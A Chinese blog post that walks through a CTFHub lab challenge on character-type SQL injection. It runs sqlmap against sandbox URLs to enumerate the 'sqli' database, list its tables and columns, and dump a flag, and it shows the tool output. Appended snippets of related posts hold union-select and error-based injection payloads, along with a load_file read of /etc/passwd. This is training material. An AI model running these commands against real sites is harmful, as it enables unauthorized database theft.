CTFHub--技能树--SQL注入--字符型注入(kali SQLmap)

于 2024-09-13 19:41:37 发布
阅读量273 收藏
点赞数 4
文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_82644071/article/details/142217962
版权

字符型注入

1:打开配置环境看到

那先输入1看看,

发现URL出现了改变,这下可以直接使用kali自带的SQLmap

SQLmap--kali

1:打开kali ,输入我们的目标URL

[19:24:10] [INFO] starting wizard interface
Please enter full target URL (-u): http://challenge-aabda6a71cc14ee4.sandbox.ctfhub.com:10800/?id=1

2:然后我们得到了

web application technology: OpenResty 1.21.4.2                                                                                                                                                                                             
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)                                                                                                                                                                                              
banner: '10.3.22-MariaDB-0+deb10u1'                                                                                                                                                                                                        
current user: 'root@localhost'                                                                                                                                                                                                             
current database: 'sqli'                                                                                                                                                                                                                   
current user is DBA: True

数据库名是sqli

3:查看数据名下的表

sqlmap -u "http://challenge-0b7c0ebf73b5a679.sandbox.ctfhub.com:10080/?id=1" -D sqli --tables

得到表名flag和news,我们就去看flag表名下的列

4:表名下的列

 sqlmap -u"http://challenge-1263a0320a449d85.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --columns

5:爆破表里内容

 sqlmap -u"http://challenge-27de31105a5f1c90.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag -C flag --dump

得到

Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag                             |
+----------------------------------+
| ctfhub{1d3df9118e193589ecf16fe3} |
+----------------------------------+

bp.o
关注
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
CTFHub技能树_sql注入
m0_54525483的博客
06-14 304
Refer注入 burp suite抓包,添加headers 题目让我们加一个headers ,name为referer ,value为ID 可以看到有数据返回,接着我们测试 id=1 id=2 id=1+1 猜测此处的查询语句为 select x from xxxxx where id=(int) 为数值注入 id=1’ 我们发现'原封不动的插入了,说明不用闭合其他字符,所以直接开始注入 order by 1 order by 2依次 order by 3的时候发现data没有返回值了 说明当前查询只
CTFhub 报错注入
plant1234的博客
06-16 248
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
题解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2344
数据库注入
CTFHub技能树 Web-SQL注入 详解
weixin_45808483的博客
11-16 4809
整数注入 我们输入 1 不断尝试发现闭合方式就是 1 ,整数 存在两列 order by 2 存在两个注入点 /?id=-1 union select 8,9 爆库,当前数据库sqli /?id=-1 union select 8,database() 爆出所有表名,这里我们需要吧sqli转换为16进制 /?id=-1 union select 8,group_concat(table_name) from infromation_schema...
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 2090
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7299
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3137
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
SQL注入-基础步骤(先判断好相关信息,然后使用Kalisqlmap进行注入
weixin_47696216的博客
11-24 2078
SQL注入基础
渗透测试靶机实战-SQL注入getshell
yummy11111的博客
07-18 921
SQL注入getshell靶机实战
CTFHub 技能树SQL注入
滚滚是只小狐狸
03-05 1110
标题CTFHub 技能树SQL注入 进入CTFHub官网 一:SQL整数注入 开题出现的界面是这样的,根据提示输入 1 后,出现两处回显,这里可以使用 工具注入也可以使用手工注入。 手工注入可以看一下这个博主写的查看手工注入 如果想了解工具的话就继续往下看吧☺ 我使用的是 kali 自带的 sqlmap 工具 1)因为一开始我们就已经知道存在注入点,于是这个步骤可有可无,但是还是可以看看数...
CTFHUB技能树SQL注入
2401_82985722的博客
03-26 991
MySQL提供的 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。用group by(order by)判断查询列数,group by 2有回显 3无回显,证明字段数量为2列。修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22。2-1回显与1一样,判断为数字注入(不用考虑闭合符合)爆出flag数据表中的全部字段名,得到完整flag。2-1的回显界面与1不一样,判断为字符注入。输入1时正常回显,输入1'时报错。
CTFHub——技能树——SQL注入sqlmap
sparename的博客
12-26 7384
SQL注入整数注入sqlmap简介检测注入实战解题字符注入报错注入布尔盲注时间盲注MySQL结构Cookie注入UA注入Refer注入过滤空格 整数注入 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用u
CTFHUB-技能树-WEB-SQL注入
慢就是快
04-16 508
文章目录1.整数注入2.字符注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
CTFHUB-技能树-Web题-SQL注入-整数注入
Static______的博客
03-28 552
利用 group_concat() 函数进行查询连接所有的表名。还可以读取到 /etc/passwd 文件。load_file( )函数 读文件操作。1,2又有数值,说明两字段都有回显。由此判断存在两个字段。
CTFHUB技能树SQL注入整数字符注入
zw1358978796的博客
03-02 466
这里写目录标题一整数注入字符注入 一整数注入 1在url地址栏中id属性後面添加 id =1 and 1=1 查看是否报错,添加后发现能正常访问,就将代码改为 id =1 and 1=2 添加代码后发现会出现报错,此时说明有sql注入点 直接进入第二步,查询字段使用: id=1 and 1=1 order by 1 id=1 and 1=1 order by 2 id=1 and 1=1 order by 3 将数值改到3时,发现报错,此时发现表中只有两个字段 进入第三步,使用sql语句
报错注入常见函数原理
p_utao的博客
11-04 682
floor函数 select count(*),(floor(rand(0)*2))x from table group by x; select查询语句 group by进行分组(相同为一组) rand()生成0到1的随机数 floor()返回整数 count()对数据整合(类似去重) 产生原因:mysql在执行该语句会建立一个虚拟表,表中有两个字段(一个是分组的值和一个计数的值),当分组已经存在后就会爆错。 参考:http://www.cnblogs.com/sfriend/p/11365999.ht
awvs-kali-15.3
最新发布
04-30
AWVS-Kali-15.3是指Acunetix Web Vulnerability Scanner(AWVS)在Kali Linux 15.3版本上的安装和使用。AWVS是一款常用的Web应用程序漏洞扫描工具,用于检测和识别Web应用程序中的安全漏洞。 在Kali Linux 15.3上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值